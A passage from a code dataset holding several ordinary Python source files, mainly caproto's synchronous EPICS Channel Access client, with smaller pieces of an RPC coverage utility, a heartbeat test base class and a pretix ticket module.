\"\"\"\n agent_keys = list(self._agents.keys())\n if self.shuffle:\n random.shuffle(agent_keys)\n for stage in self.stage_list:\n for agent_key in agent_keys:\n getattr(self._agents[agent_key], stage)() # Run stage\n if self.shuffle_between_stages:\n random.shuffle(agent_keys)\n self.time += self.stage_time\n\n self.steps += 1\n"} {"ext": "py", "sha": "1a2f7375731ff790c98d9989c7a03f71c3314ff6", "content": "#!/usr/bin/env python3\n# Copyright (c) 2015-2016 The Bitcoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\"\"\"Utilities for doing coverage analysis on the RPC interface.\n\nProvides a way to track which RPC commands are exercised during\ntesting.\n\"\"\"\n\nimport os\n\n\nREFERENCE_FILENAME = 'rpc_interface.txt'\n\n\nclass AuthServiceProxyWrapper(object):\n \"\"\"\n An object that wraps AuthServiceProxy to record specific RPC calls.\n\n \"\"\"\n def __init__(self, auth_service_proxy_instance, coverage_logfile=None):\n \"\"\"\n Kwargs:\n auth_service_proxy_instance (AuthServiceProxy): the instance\n being wrapped.\n coverage_logfile (str): if specified, write each service_name\n out to a file when called.\n\n \"\"\"\n self.auth_service_proxy_instance = auth_service_proxy_instance\n self.coverage_logfile = coverage_logfile\n\n def __getattr__(self, *args, **kwargs):\n return_val = self.auth_service_proxy_instance.__getattr__(\n *args, **kwargs)\n\n return AuthServiceProxyWrapper(return_val, self.coverage_logfile)\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Delegates to AuthServiceProxy, then writes the particular RPC method\n called to a file.\n\n \"\"\"\n return_val = self.auth_service_proxy_instance.__call__(*args, **kwargs)\n rpc_method = self.auth_service_proxy_instance._service_name\n\n if self.coverage_logfile:\n with open(self.coverage_logfile, 'a+', encoding='utf8') as f:\n f.write(\"%s\\n\" % rpc_method)\n\n return return_val\n\n @property\n def url(self):\n return self.auth_service_proxy_instance.url\n\n def __truediv__(self, relative_uri):\n return AuthServiceProxyWrapper(self.auth_service_proxy_instance / relative_uri)\n\ndef get_filename(dirname, n_node):\n \"\"\"\n Get a filename unique to the test process ID and node.\n\n This file will contain a list of RPC commands covered.\n \"\"\"\n pid = str(os.getpid())\n return os.path.join(\n dirname, \"coverage.pid%s.node%s.txt\" % (pid, str(n_node)))\n\n\ndef write_all_rpc_commands(dirname, node):\n \"\"\"\n Write out a list of all RPC functions available in `luk-cli` for\n coverage comparison. This will only happen once per coverage\n directory.\n\n Args:\n dirname (str): temporary test dir\n node (AuthServiceProxy): client\n\n Returns:\n bool. 
if the RPC interface file was written.\n\n \"\"\"\n filename = os.path.join(dirname, REFERENCE_FILENAME)\n\n if os.path.isfile(filename):\n return False\n\n help_output = node.help().split('\\n')\n commands = set()\n\n for line in help_output:\n line = line.strip()\n\n # Ignore blanks and headers\n if line and not line.startswith('='):\n commands.add(\"%s\\n\" % line.split()[0])\n\n with open(filename, 'w', encoding='utf8') as f:\n f.writelines(list(commands))\n\n return True\n"} {"ext": "py", "sha": "1a2f74bdf6cc1883c15b2549c51e4d7c863199ec", "content": "import sys\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '../../../libbeat/tests/system'))\n\nfrom beat.beat import TestCase\n\n\nclass BaseTest(TestCase):\n\n @classmethod\n def setUpClass(self):\n self.beat_name = \"heartbeat\"\n self.beat_path = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../../\"))\n"} {"ext": "py", "sha": "1a2f75412a30ffd04cdf8f15b9ac5bf891894100", "content": "# This module contains a synchronous implementation of a Channel Access client\n# as three top-level functions: read, write, subscribe. They are comparatively\n# simple and naive, with no caching or concurrency, and therefore less\n# performant but more robust.\nimport getpass\nimport inspect\nimport logging\nimport selectors\nimport socket\nimport threading # just to make callback processing thread-safe\nimport time\nimport weakref\n\nimport caproto as ca\n\nfrom .._dbr import ChannelType, SubscriptionType, field_types, native_type\nfrom .._utils import (CaprotoError, CaprotoTimeoutError, ErrorResponseReceived,\n adapt_old_callback_signature, get_environment_variables,\n safe_getsockname)\nfrom .repeater import spawn_repeater\n\n__all__ = ('read', 'write', 'subscribe', 'block', 'interrupt',\n 'read_write_read')\nlogger = logging.getLogger('caproto.ctx')\n\n# Make a dict to hold our tcp sockets.\nsockets = {}\nglobal_circuits = {}\n\n_permission_to_block = [] # mutable state shared by block and interrupt\n\n\n# Convenience functions that do both transport and caproto validation/ingest.\ndef send(circuit, command, pv_name=None):\n if pv_name is not None:\n tags = {'pv': pv_name}\n else:\n tags = None\n buffers_to_send = circuit.send(command, extra=tags)\n sockets[circuit].sendmsg(buffers_to_send)\n\n\ndef recv(circuit):\n bytes_received = sockets[circuit].recv(4096)\n commands, _ = circuit.recv(bytes_received)\n for c in commands:\n circuit.process_command(c)\n return commands\n\n\ndef search(pv_name, udp_sock, timeout, *, max_retries=2):\n # Set Broadcaster log level to match our logger.\n b = ca.Broadcaster(our_role=ca.CLIENT)\n b.client_address = safe_getsockname(udp_sock)\n\n # Send registration request to the repeater\n logger.debug('Registering with the Channel Access repeater.')\n bytes_to_send = b.send(ca.RepeaterRegisterRequest())\n\n env = get_environment_variables()\n repeater_port = env['EPICS_CA_REPEATER_PORT']\n\n client_address_list = ca.get_client_address_list()\n local_address = ca.get_local_address()\n\n try:\n udp_sock.sendto(bytes_to_send, (local_address, repeater_port))\n except OSError as exc:\n raise ca.CaprotoNetworkError(\n f\"Failed to send to {local_address}:{repeater_port}\") from exc\n\n logger.debug(\"Searching for %r....\", pv_name)\n commands = (\n ca.VersionRequest(0, ca.DEFAULT_PROTOCOL_VERSION),\n ca.SearchRequest(pv_name, 0, ca.DEFAULT_PROTOCOL_VERSION))\n bytes_to_send = b.send(*commands)\n tags = {'role': 'CLIENT',\n 'our_address': b.client_address,\n 'direction': '--->>>'}\n\n def send_search():\n 
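# Broadcast the same VersionRequest + SearchRequest datagram to every\n        # destination in the client address list; check_timeout() calls this again\n        # on each retry.\n        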
for dest in client_address_list:\n tags['their_address'] = dest\n b.log.debug(\n '%d commands %dB',\n len(commands), len(bytes_to_send), extra=tags)\n try:\n udp_sock.sendto(bytes_to_send, dest)\n except OSError as exc:\n host, port = dest\n raise ca.CaprotoNetworkError(f\"Failed to send to {host}:{port}\") from exc\n\n def check_timeout():\n nonlocal retry_at\n\n if time.monotonic() >= retry_at:\n send_search()\n retry_at = time.monotonic() + retry_timeout\n\n if time.monotonic() - t > timeout:\n raise CaprotoTimeoutError(f\"Timed out while awaiting a response \"\n f\"from the search for {pv_name!r}. Search \"\n f\"requests were sent to this address list: \"\n f\"{ca.get_address_list()}.\")\n\n # Initial search attempt\n send_search()\n\n # Await a search response, and keep track of registration status\n retry_timeout = timeout / max((max_retries, 1))\n t = time.monotonic()\n retry_at = t + retry_timeout\n\n try:\n orig_timeout = udp_sock.gettimeout()\n udp_sock.settimeout(retry_timeout)\n while True:\n try:\n bytes_received, address = udp_sock.recvfrom(ca.MAX_UDP_RECV)\n except socket.timeout:\n check_timeout()\n continue\n\n check_timeout()\n\n commands = b.recv(bytes_received, address)\n b.process_commands(commands)\n for command in commands:\n if isinstance(command, ca.SearchResponse) and command.cid == 0:\n address = ca.extract_address(command)\n logger.debug('Found %r at %s:%d', pv_name, *address)\n return address\n else:\n # None of the commands we have seen are a reply to our request.\n # Receive more data.\n continue\n finally:\n udp_sock.settimeout(orig_timeout)\n\n\ndef make_channel(pv_name, udp_sock, priority, timeout):\n log = logging.LoggerAdapter(logging.getLogger('caproto.ch'), {'pv': pv_name})\n address = search(pv_name, udp_sock, timeout)\n try:\n circuit = global_circuits[(address, priority)]\n except KeyError:\n\n circuit = global_circuits[(address, priority)] = ca.VirtualCircuit(\n our_role=ca.CLIENT,\n address=address,\n priority=priority)\n\n chan = ca.ClientChannel(pv_name, circuit)\n new = False\n if chan.circuit not in sockets:\n new = True\n sockets[chan.circuit] = socket.create_connection(chan.circuit.address,\n timeout)\n circuit.our_address = sockets[chan.circuit].getsockname()\n try:\n if new:\n # Initialize our new TCP-based CA connection with a VersionRequest.\n send(chan.circuit, ca.VersionRequest(\n priority=priority,\n version=ca.DEFAULT_PROTOCOL_VERSION),\n pv_name)\n send(chan.circuit, chan.host_name(socket.gethostname()))\n send(chan.circuit, chan.client_name(getpass.getuser()))\n send(chan.circuit, chan.create(), pv_name)\n t = time.monotonic()\n while True:\n try:\n commands = recv(chan.circuit)\n if time.monotonic() - t > timeout:\n raise socket.timeout\n except socket.timeout:\n raise CaprotoTimeoutError(\"Timeout while awaiting channel \"\n \"creation.\")\n tags = {'direction': '<<<---',\n 'our_address': chan.circuit.our_address,\n 'their_address': chan.circuit.address}\n for command in commands:\n if isinstance(command, ca.Message):\n tags['bytesize'] = len(command)\n logger.debug(\"%r\", command, extra=tags)\n elif command is ca.DISCONNECTED:\n raise CaprotoError('Disconnected during initialization')\n if chan.states[ca.CLIENT] is ca.CONNECTED:\n log.info(\"Channel connected.\")\n break\n\n except BaseException:\n sockets[chan.circuit].close()\n del sockets[chan.circuit]\n del global_circuits[(chan.circuit.address, chan.circuit.priority)]\n raise\n return chan\n\n\ndef _read(chan, timeout, data_type, data_count, notify, force_int_enums):\n 
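# Send a Read(Notify)Request on the channel's circuit and block until the\n    # response with a matching ioid arrives, raising on ErrorResponse,\n    # disconnection, or timeout.\n    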
logger = chan.log\n logger.debug(\"Detected native data_type %r.\", chan.native_data_type)\n ntype = native_type(chan.native_data_type) # abundance of caution\n if ((ntype is ChannelType.ENUM) and\n (data_type is None) and (not force_int_enums)):\n logger.debug(\"Changing requested data_type to STRING.\")\n data_type = ChannelType.STRING\n req = chan.read(data_type=data_type, data_count=data_count, notify=notify)\n send(chan.circuit, req, chan.name)\n t = time.monotonic()\n while True:\n try:\n commands = recv(chan.circuit)\n except socket.timeout:\n commands = []\n\n if time.monotonic() - t > timeout:\n raise CaprotoTimeoutError(\"Timeout while awaiting reading.\")\n\n tags = {'direction': '<<<---',\n 'our_address': chan.circuit.our_address,\n 'their_address': chan.circuit.address}\n for command in commands:\n if isinstance(command, ca.Message):\n tags['bytesize'] = len(command)\n logger.debug(\"%r\", command, extra=tags)\n if (isinstance(command, (ca.ReadResponse, ca.ReadNotifyResponse)) and\n command.ioid == req.ioid):\n return command\n elif isinstance(command, ca.ErrorResponse):\n raise ErrorResponseReceived(command)\n elif command is ca.DISCONNECTED:\n raise CaprotoError('Disconnected while waiting for '\n 'read response')\n\n\ndef read(pv_name, *, data_type=None, data_count=None, timeout=1, priority=0,\n notify=True, force_int_enums=False, repeater=True):\n \"\"\"\n Read a Channel.\n\n Parameters\n ----------\n pv_name : str\n The PV name to read from\n data_type : {'native', 'status', 'time', 'graphic', 'control'} or ChannelType or int ID, optional\n Request specific data type or a class of data types, matched to the\n channel's native data type. Default is Channel's native data type.\n data_count : integer, optional\n Requested number of values. Default is the channel's native data\n count.\n timeout : float, optional\n Default is 1 second.\n priority : 0, optional\n Virtual Circuit priority. Default is 0, lowest. Highest is 99.\n notify : boolean, optional\n Send a ReadNotifyRequest instead of a ReadRequest. True by default.\n force_int_enums : boolean, optional\n Retrieve enums as integers. 
(Default is strings.)\n repeater : boolean, optional\n Spawn a Channel Access Repeater process if the port is available.\n True default, as the Channel Access spec stipulates that well-behaved\n clients should do this.\n\n Returns\n -------\n response : ReadResponse or ReadNotifyResponse\n\n Examples\n --------\n\n Get the value of a Channel named 'simple:A'.\n\n >>> read('simple:A').data\n array([1], dtype=int32)\n\n Request a richer Channel Access data type that includes the timestamp, and\n access the timestamp.\n\n >>> read('cat', data_type='time').metadata.timestmap\n 1570622339.042392\n\n A convenience method is provided for access the timestamp as a Python\n datetime object.\n\n >>> read('cat' data_type='time').metadata.stamp.as_datetime()\n datetime.datetime(2019, 10, 9, 11, 58, 59, 42392)\n\n The requested data type may also been given as a specific Channel Access\n type\n\n >>> from caproto import ChannelType\n >>> read('cat', data_type=ChannelType.CTRL_FLOAT).metadata\n DBR_CTRL_FLOAT(\n status=,\n severity=,\n upper_disp_limit=0.0,\n lower_disp_limit=0.0,\n upper_alarm_limit=0.0,\n upper_warning_limit=0.0,\n lower_warning_limit=0.0,\n lower_alarm_limit=0.0,\n upper_ctrl_limit=0.0,\n lower_ctrl_limit=0.0,\n precision=0,\n units=b'')\n\n or the corresponding integer identifer\n\n >>> read('cat', data_type=30).metadata\n DBR_CTRL_FLOAT(\n status=,\n severity=,\n upper_disp_limit=0.0,\n lower_disp_limit=0.0,\n upper_alarm_limit=0.0,\n upper_warning_limit=0.0,\n lower_warning_limit=0.0,\n lower_alarm_limit=0.0,\n upper_ctrl_limit=0.0,\n lower_ctrl_limit=0.0,\n precision=0,\n units=b'')\n \"\"\"\n if repeater:\n # As per the EPICS spec, a well-behaved client should start a\n # caproto-repeater that will continue running after it exits.\n spawn_repeater()\n udp_sock = ca.bcast_socket()\n # Must bind or getsocketname() will raise on Windows.\n # See https://github.com/caproto/caproto/issues/514.\n udp_sock.bind(('', 0))\n try:\n udp_sock.settimeout(timeout)\n chan = make_channel(pv_name, udp_sock, priority, timeout)\n finally:\n udp_sock.close()\n try:\n return _read(chan, timeout, data_type=data_type, data_count=data_count,\n notify=notify, force_int_enums=force_int_enums)\n finally:\n try:\n if chan.states[ca.CLIENT] is ca.CONNECTED:\n send(chan.circuit, chan.clear(), chan.name)\n finally:\n sockets[chan.circuit].close()\n del sockets[chan.circuit]\n del global_circuits[(chan.circuit.address, chan.circuit.priority)]\n\n\ndef subscribe(pv_name, priority=0, data_type=None, data_count=None,\n low=0.0, high=0.0, to=0.0, mask=None):\n \"\"\"\n Define a subscription.\n\n Parameters\n ----------\n pv_name : string\n The PV name to subscribe to\n priority : integer, optional\n Used by the server to triage subscription responses when under high\n load. 0 is lowest; 99 is highest.\n data_type : {'native', 'status', 'time', 'graphic', 'control'} or ChannelType or int ID, optional\n Request specific data type or a class of data types, matched to the\n channel's native data type. Default is Channel's native data type.\n data_count : integer, optional\n Requested number of values. 
Default is the channel's native data\n        count, which can be checked in the Channel's attribute\n        :attr:`native_data_count`.\n    low, high, to : float, optional\n        deprecated by Channel Access, not yet implemented by caproto\n    mask : SubscriptionType, optional\n        Subscribe to selective updates.\n\n    Examples\n    --------\n\n    Define a subscription on the ``random_walk:x`` PV.\n\n    >>> sub = subscribe('random_walk:x')\n\n    Add one or more user-defined callbacks to process responses.\n\n    >>> def f(sub, response):\n    ...     print(response.data)\n    ...\n    >>> sub.add_callback(f)\n\n    Activate the subscription and process incoming responses.\n\n    >>> sub.block()\n\n    This is a blocking operation in the sync client. (To do this on a\n    background thread, use the threading client.) Interrupt using Ctrl+C or\n    by calling :meth:`sub.interrupt()` from another thread.\n\n    The subscription may be reactivated by calling ``sub.block()`` again.\n\n    To process multiple subscriptions at once, use the *function*\n    :func:`block`, which takes one or more Subscriptions as arguments.\n\n    >>> block(sub1, sub2)\n\n    There is also an :func:`interrupt` function, which is merely an alias to\n    the method.\n    \"\"\"\n    return Subscription(pv_name, priority, data_type, data_count, low, high,\n                        to, mask)\n\n\ndef interrupt():\n    \"\"\"\n    Signal to :func:`block` to stop blocking. Idempotent.\n\n    This obviously cannot be called interactively while blocked;\n    it is intended to be called from another thread.\n    \"\"\"\n    _permission_to_block.clear()\n\n\ndef block(*subscriptions, duration=None, timeout=1, force_int_enums=False,\n          repeater=True):\n    \"\"\"\n    Activate one or more subscriptions and process incoming responses.\n\n    Use Ctrl+C (SIGINT) to escape, or from another thread, call\n    :func:`interrupt()`.\n\n    Parameters\n    ----------\n    *subscriptions : Subscriptions\n        The list of subscriptions.\n    duration : float, optional\n        How many seconds to run for. Run forever (None) by default.\n    timeout : float, optional\n        Default is 1 second. This is not the same as `for`; this is the timeout\n        for failure in the event of no connection.\n    force_int_enums : boolean, optional\n        Retrieve enums as integers. 
(Default is strings.)\n    repeater : boolean, optional\n        Spawn a Channel Access Repeater process if the port is available.\n        True default, as the Channel Access spec stipulates that well-behaved\n        clients should do this.\n\n    Examples\n    --------\n\n    Activate subscription(s) and block while they process updates.\n\n    >>> sub1 = subscribe('cat')\n    >>> sub2 = subscribe('dog')\n    >>> block(sub1, sub2)\n    \"\"\"\n    _permission_to_block.append(object())\n    if duration is not None:\n        deadline = time.time() + duration\n    else:\n        deadline = None\n    if repeater:\n        # As per the EPICS spec, a well-behaved client should start a\n        # caproto-repeater that will continue running after it exits.\n        spawn_repeater()\n    loggers = {}\n    for sub in subscriptions:\n        loggers[sub.pv_name] = logging.LoggerAdapter(logging.getLogger('caproto.ch'),\n                                                     {'pv': sub.pv_name})\n    udp_sock = ca.bcast_socket()\n    # Must bind or getsocketname() will raise on Windows.\n    # See https://github.com/caproto/caproto/issues/514.\n    udp_sock.bind(('', 0))\n    try:\n        udp_sock.settimeout(timeout)\n        channels = {}\n        for sub in subscriptions:\n            pv_name = sub.pv_name\n            chan = make_channel(pv_name, udp_sock, sub.priority, timeout)\n            channels[sub] = chan\n    finally:\n        udp_sock.close()\n    try:\n        # Subscribe to all the channels.\n        sub_ids = {}\n        for sub, chan in channels.items():\n            loggers[chan.name].debug(\"Detected native data_type %r.\",\n                                     chan.native_data_type)\n\n            # abundance of caution\n            ntype = field_types['native'][chan.native_data_type]\n            if ((ntype is ChannelType.ENUM) and (not force_int_enums)):\n                ntype = ChannelType.STRING\n            time_type = field_types['time'][ntype]\n            # Adjust the timeout during monitoring.\n            sockets[chan.circuit].settimeout(None)\n            loggers[chan.name].debug(\"Subscribing with data_type %r.\",\n                                     time_type)\n            req = chan.subscribe(\n                data_type=time_type, data_count=sub.data_count, mask=sub.mask)\n            send(chan.circuit, req, chan.name)\n            sub_ids[(chan.circuit, req.subscriptionid)] = sub\n        logger.debug('Subscribed. Building socket selector.')\n        try:\n            circuits = set(chan.circuit for chan in channels.values())\n            selector = selectors.DefaultSelector()\n            sock_to_circuit = {}\n            for circuit in circuits:\n                sock = sockets[circuit]\n                sock_to_circuit[sock] = circuit\n                selector.register(sock, selectors.EVENT_READ)\n            if duration is None:\n                logger.debug('Continuing until SIGINT is received....')\n            while True:\n                events = selector.select(timeout=0.1)\n                if deadline is not None and time.time() > deadline:\n                    logger.debug('Deadline reached.')\n                    return\n                if not _permission_to_block:\n                    logger.debug(\"Interrupted via \"\n                                 \"caproto.sync.client.interrupt().\")\n                    break\n                for selector_key, _ in events:\n                    circuit = sock_to_circuit[selector_key.fileobj]\n                    commands = recv(circuit)\n                    for response in commands:\n                        if isinstance(response, ca.ErrorResponse):\n                            raise ErrorResponseReceived(response)\n                        if response is ca.DISCONNECTED:\n                            # TODO Re-connect.\n                            raise CaprotoError(\"Disconnected\")\n                        sub = sub_ids.get((circuit, response.subscriptionid))\n                        if sub:\n                            sub.process(response)\n        except KeyboardInterrupt:\n            logger.debug('Received SIGINT. 
Closing.')\n pass\n finally:\n _permission_to_block.clear()\n try:\n for chan in channels.values():\n if chan.states[ca.CLIENT] is ca.CONNECTED:\n send(chan.circuit, chan.clear(), chan.name)\n finally:\n # Reinstate the timeout for channel cleanup.\n for chan in channels.values():\n sockets[chan.circuit].settimeout(timeout)\n sockets[chan.circuit].close()\n del sockets[chan.circuit]\n del global_circuits[(chan.circuit.address, chan.circuit.priority)]\n\n\ndef _write(chan, data, metadata, timeout, data_type, notify):\n logger.debug(\"Detected native data_type %r.\", chan.native_data_type)\n # abundance of caution\n ntype = field_types['native'][chan.native_data_type]\n if (data_type is None) and (ntype is ChannelType.ENUM):\n # Change data_type to STRING if data contains string-like data, or\n # iterable of string-like data\n stringy_data = False\n if isinstance(data, (str, bytes)):\n stringy_data = True\n if hasattr(data, '__getitem__') \\\n and len(data) > 0 \\\n and isinstance(data[0], (str, bytes)):\n stringy_data = True\n\n if stringy_data:\n logger.debug(\"Will write to ENUM as data_type STRING.\")\n data_type = ChannelType.STRING\n logger.debug(\"Writing.\")\n req = chan.write(data=data, notify=notify,\n data_type=data_type, metadata=metadata)\n send(chan.circuit, req, chan.name)\n t = time.monotonic()\n if notify:\n while True:\n try:\n commands = recv(chan.circuit)\n except socket.timeout:\n commands = []\n\n if time.monotonic() - t > timeout:\n raise CaprotoTimeoutError(\"Timeout while awaiting write reply.\")\n\n tags = {'direction': '<<<---',\n 'our_address': chan.circuit.our_address,\n 'their_address': chan.circuit.address}\n for command in commands:\n if isinstance(command, ca.Message):\n tags['bytesize'] = len(command)\n logger.debug(\"%r\", command, extra=tags)\n if (isinstance(command, ca.WriteNotifyResponse) and\n command.ioid == req.ioid):\n response = command\n break\n elif isinstance(command, ca.ErrorResponse):\n raise ErrorResponseReceived(command)\n elif command is ca.DISCONNECTED:\n raise CaprotoError('Disconnected while waiting for '\n 'write response')\n else:\n continue\n break\n return response\n else:\n return None\n\n\ndef write(pv_name, data, *, notify=False, data_type=None, metadata=None,\n timeout=1, priority=0,\n repeater=True):\n \"\"\"\n Write to a Channel.\n\n Parameters\n ----------\n pv_name : str\n The PV name to write to\n data : str, bytes, int, or float or any Iterable of these\n Value(s) to write.\n notify : boolean, optional\n Request notification of completion and wait for it. False by default.\n data_type : {'native', 'status', 'time', 'graphic', 'control'} or ChannelType or int ID, optional\n Write as specific data type. Default is inferred from input.\n metadata : ``ctypes.BigEndianStructure`` or tuple\n Status and control metadata for the values\n timeout : float, optional\n Default is 1 second.\n priority : 0, optional\n Virtual Circuit priority. Default is 0, lowest. 
Highest is 99.\n    repeater : boolean, optional\n        Spawn a Channel Access Repeater process if the port is available.\n        True default, as the Channel Access spec stipulates that well-behaved\n        clients should do this.\n\n    Returns\n    -------\n    response : WriteNotifyResponse or None\n        ``None`` unless ``notify=True``.\n\n    Examples\n    --------\n    Write the value 5 to a Channel named 'simple:A'.\n\n    >>> write('simple:A', 5)  # returns None\n\n    Request notification of completion (\"put completion\") and wait for it.\n\n    >>> write('cat', 5, notify=True)  # blocks until complete, then returns:\n    WriteNotifyResponse(\n    data_type=,\n    data_count=1,\n    status=CAStatusCode(\n    name='ECA_NORMAL', code=0, code_with_severity=1,\n    severity=,\n    success=1, defunct=False,\n    description='Normal successful completion'),\n    ioid=0)\n    \"\"\"\n    if repeater:\n        # As per the EPICS spec, a well-behaved client should start a\n        # caproto-repeater that will continue running after it exits.\n        spawn_repeater()\n\n    udp_sock = ca.bcast_socket()\n    # Must bind or getsocketname() will raise on Windows.\n    # See https://github.com/caproto/caproto/issues/514.\n    udp_sock.bind(('', 0))\n    try:\n        udp_sock.settimeout(timeout)\n        chan = make_channel(pv_name, udp_sock, priority, timeout)\n    finally:\n        udp_sock.close()\n    try:\n        return _write(chan, data, metadata, timeout, data_type, notify)\n    finally:\n        try:\n            if chan.states[ca.CLIENT] is ca.CONNECTED:\n                send(chan.circuit, chan.clear(), chan.name)\n        finally:\n            sockets[chan.circuit].close()\n            del sockets[chan.circuit]\n            del global_circuits[(chan.circuit.address, chan.circuit.priority)]\n\n\ndef read_write_read(pv_name, data, *, notify=False,\n                    read_data_type=None, write_data_type=None,\n                    metadata=None, timeout=1, priority=0,\n                    force_int_enums=False, repeater=True):\n    \"\"\"\n    Write to a Channel, but sandwich the write between two reads.\n\n    This is what the command-line utilities ``caproto-put`` and ``caput`` do.\n    Notice that if you want the second reading to reflect the written value,\n    you should pass the parameter ``notify=True``. (This is also true of\n    ``caproto-put``/``caput``, which needs the ``-c`` argument to behave the\n    way you might expect it to behave.)\n\n    This is provided as a separate function in order to support ``caproto-put``\n    efficiently. Making separate calls to :func:`read` and :func:`write` would\n    re-create a connection redundantly.\n\n    Parameters\n    ----------\n    pv_name : str\n        The PV name to write/read/write\n    data : str, bytes, int, or float or any Iterable of these\n        Value to write.\n    notify : boolean, optional\n        Request notification of completion and wait for it. False by default.\n    read_data_type : {'native', 'status', 'time', 'graphic', 'control'} or ChannelType or int ID, optional\n        Request specific data type.\n    write_data_type : {'native', 'status', 'time', 'graphic', 'control'} or ChannelType or int ID, optional\n        Write as specific data type. Default is inferred from input.\n    metadata : ``ctypes.BigEndianStructure`` or tuple\n        Status and control metadata for the values\n    timeout : float, optional\n        Default is 1 second.\n    priority : 0, optional\n        Virtual Circuit priority. Default is 0, lowest. Highest is 99.\n    force_int_enums : boolean, optional\n        Retrieve enums as integers. 
(Default is strings.)\n repeater : boolean, optional\n Spawn a Channel Access Repeater process if the port is available.\n True default, as the Channel Access spec stipulates that well-behaved\n clients should do this.\n\n Returns\n -------\n initial, write_response, final : tuple of response\n\n The middle response comes from the write, and it will be ``None`` unless\n ``notify=True``.\n\n Examples\n --------\n\n Write the value 5 to a Channel named 'simple:A'.\n\n >>> read_write_read('cat', 5) # returns initial, None, final\n\n Request notification of completion (\"put completion\") and wait for it.\n\n >>> read_write_read('cat', 5, notify=True) # initial, WriteNotifyResponse, final\n \"\"\"\n if repeater:\n # As per the EPICS spec, a well-behaved client should start a\n # caproto-repeater that will continue running after it exits.\n spawn_repeater()\n\n udp_sock = ca.bcast_socket()\n # Must bind or getsocketname() will raise on Windows.\n # See https://github.com/caproto/caproto/issues/514.\n udp_sock.bind(('', 0))\n try:\n udp_sock.settimeout(timeout)\n chan = make_channel(pv_name, udp_sock, priority, timeout)\n finally:\n udp_sock.close()\n try:\n initial = _read(chan, timeout, read_data_type, None, notify=True,\n force_int_enums=force_int_enums)\n res = _write(chan, data, metadata, timeout, write_data_type, notify)\n final = _read(chan, timeout, read_data_type, None, notify=True,\n force_int_enums=force_int_enums)\n finally:\n try:\n if chan.states[ca.CLIENT] is ca.CONNECTED:\n send(chan.circuit, chan.clear(), chan.name)\n finally:\n sockets[chan.circuit].close()\n del sockets[chan.circuit]\n del global_circuits[(chan.circuit.address, chan.circuit.priority)]\n return initial, res, final\n\n\nclass Subscription:\n \"\"\"\n This object encapsulates state related to a Subscription.\n\n See the :func:`subscribe` function.\n \"\"\"\n def __init__(self, pv_name, priority=0, data_type=None, data_count=None,\n low=0.0, high=0.0, to=0.0, mask=None):\n if mask is None:\n mask = SubscriptionType.DBE_VALUE | SubscriptionType.DBE_ALARM\n self.pv_name = pv_name\n self.priority = priority\n self.data_type = data_type\n self.data_count = data_count\n self.low = low\n self.high = high\n self.to = to\n self.mask = mask\n\n self.callbacks = {}\n self._callback_id = 0\n self._callback_lock = threading.RLock()\n\n # This is related to back-compat for user callbacks that have the old\n # signature, f(response).\n self.__wrapper_weakrefs = set()\n\n def block(self, duration=None, timeout=1,\n force_int_enums=False,\n repeater=True):\n \"\"\"\n Activate one or more subscriptions and process incoming responses.\n\n Use Ctrl+C (SIGINT) to escape, or from another thread, call\n :meth:`interrupt()`.\n\n Convenience alias for the top-level function :func:`block`, which may\n be used to process multiple Subscriptions concurrently.\n\n Parameters\n ----------\n\n duration : float, optional\n How many seconds to run for. Run forever (None) by default.\n timeout : float, optional\n Default is 1 second. This is not the same as `for`; this is the\n timeout for failure in the event of no connection.\n force_int_enums : boolean, optional\n Retrieve enums as integers. 
(Default is strings.)\n repeater : boolean, optional\n Spawn a Channel Access Repeater process if the port is available.\n True default, as the Channel Access spec stipulates that\n well-behaved clients should do this.\n \"\"\"\n block(self, duration=duration, timeout=timeout,\n force_int_enums=force_int_enums,\n repeater=repeater)\n\n def interrupt(self):\n \"\"\"\n Signal to block() to stop blocking. Idempotent.\n\n This obviously cannot be called interactively while blocked;\n it is intended to be called from another thread.\n This method is a convenience alias for the top-level function\n :func:`interrupt`.\n \"\"\"\n interrupt()\n\n def add_callback(self, func):\n \"\"\"\n Add a callback to receive responses.\n\n Parameters\n ----------\n func : callable\n Expected signature: ``func(sub, response)``.\n\n The signature ``func(response)`` is also supported for\n backward-compatibility but will issue warnings. Support will be\n removed in a future release of caproto.\n\n Returns\n -------\n token : int\n Integer token that can be passed to :meth:`remove_callback`.\n\n .. versionchanged:: 0.5.0\n\n Changed the expected signature of ``func`` from ``func(response)``\n to ``func(sub, response)``.\n \"\"\"\n func = adapt_old_callback_signature(func, self.__wrapper_weakrefs)\n\n def removed(_):\n self.remove_callback(cb_id)\n\n if inspect.ismethod(func):\n ref = weakref.WeakMethod(func, removed)\n else:\n # TODO: strong reference to non-instance methods?\n ref = weakref.ref(func, removed)\n\n with self._callback_lock:\n cb_id = self._callback_id\n self._callback_id += 1\n self.callbacks[cb_id] = ref\n return cb_id\n\n def remove_callback(self, cb_id):\n \"\"\"\n Remove callback using token that was returned by :meth:`add_callback`.\n \"\"\"\n with self._callback_lock:\n self.callbacks.pop(cb_id, None)\n\n def process(self, response):\n \"\"\"\n Run the callbacks on a response.\n\n This is used internally by :func:`block()`, generally not called by the\n user.\n \"\"\"\n to_remove = []\n with self._callback_lock:\n callbacks = list(self.callbacks.items())\n\n for cb_id, ref in callbacks:\n callback = ref()\n if callback is None:\n to_remove.append(cb_id)\n continue\n\n callback(self, response)\n\n with self._callback_lock:\n for remove_id in to_remove:\n self.callbacks.pop(remove_id, None)\n\n def clear(self):\n \"\"\"\n Remove all callbacks. 
If currently blocking, interrupt.\n \"\"\"\n interrupt()\n with self._callback_lock:\n for cb_id in list(self.callbacks):\n self.remove_callback(cb_id)\n"} {"ext": "py", "sha": "1a2f762ca989b7431a3a975f650627d70488c10b", "content": "import logging\nimport os\n\nfrom django.core.files.base import ContentFile\nfrom django.utils.timezone import now\nfrom django.utils.translation import ugettext as _\nfrom django_scopes import scopes_disabled\n\nfrom pretix.base.i18n import language\nfrom pretix.base.models import (\n CachedCombinedTicket, CachedTicket, Event, InvoiceAddress, Order,\n OrderPosition,\n)\nfrom pretix.base.services.tasks import EventTask, ProfiledTask\nfrom pretix.base.settings import PERSON_NAME_SCHEMES\nfrom pretix.base.signals import allow_ticket_download, register_ticket_outputs\nfrom pretix.celery_app import app\nfrom pretix.helpers.database import rolledback_transaction\n\nlogger = logging.getLogger(__name__)\n\n\ndef generate_orderposition(order_position: int, provider: str):\n order_position = OrderPosition.objects.select_related('order', 'order__event').get(id=order_position)\n\n with 